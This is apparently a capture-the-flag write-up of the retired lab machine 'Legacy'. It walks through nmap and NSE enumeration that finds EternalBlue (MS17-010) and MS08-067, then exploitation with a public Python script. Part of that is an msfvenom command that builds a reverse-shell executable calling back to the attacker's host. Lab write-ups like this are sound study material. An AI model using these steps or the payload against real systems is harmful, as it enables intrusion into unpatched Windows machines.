created by ch4p // 10.10.10.4
// Enumeration //
Legacy is yet another boot-to-root simplistic machine, and we will be exploiting it using one of the most popular exploits to ever exist. We’ll yet again start off with a nmap scan, grabbing open ports and service versions. The syntax below will run a TCP connect scan on all 65,535 ports, run all the default NSE scripts, as well as verbosely print out it’s status. The -oG will output to in a greppable format to the file path specified.
nmap -Pn -A -p- -v 10.10.10.4 -oG /home/rp/Desktop/Legacy/nmap
Really not much to go off, except SMB. I’ll try my usual smbmap, but it’ll turn up no results. Let’s see if NSE can’t help us again. NSE comes with quite a few SMB scripts, which you can see using the locate command.
sudo updatedb
locate *.nse |grep smb
We can go ahead and utilize these by typing the syntax below:
nmap -Pn --script vuln -p 445 10.10.10.4
This returns two of the biggest vulnerabilities to ever hit the web, CVE-2017-0143 and CVE-2008-4250. You may know 2017-0143 better as MS17-010, popularly called EternalBlue. This was the vulnerability that allowed the ransomware known as ‘WannaCry’ to propagate in 2017. Our other CVE, 2008-4250, is popularly known as ‘Netapi’ or MS08-067. It triggers an overflow using a specially crafted RPC packet, targeting the NetAPI32.dll, and raining shells back to the executor. Both of these vulnerabilities have Metasploit modules associated with them.
Note- CVE-2017-0143 is known to cause the good old blue screen of death, if it successfully executes and you lose session, it is likely you won’t be able to get back in until the machine is reset.
// Exploitation //
Let’s try out EternalBlue first. Metasploit is boring, so we’ll use a python script, kindly maintained by helviojunior over on Github. While the script does allow you to pass in credentials, they aren’t required, and will default to an Anonymous login if not supplied. All we need is an IP and a payload. We’ll use msfvenom to craft that second part.
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.14.23 LPORT=443 -f exe > supersafe.exe
LHOST will be you local machine (the attacker). Now we’ll open a netcat listener on the LPORT to catch this shell, and use the python script to send it on over.
Note- If you’re super lucky like me, you may need to install the impacket module for this script to work.
pip install impacket
We’re able to change directory to C:\\, so odds are, we’re system. Let’s find the flags.
With Metasploit, it’s pretty much the same as any module. And by that, I mean boring. We’ll use NetAPI for funsies.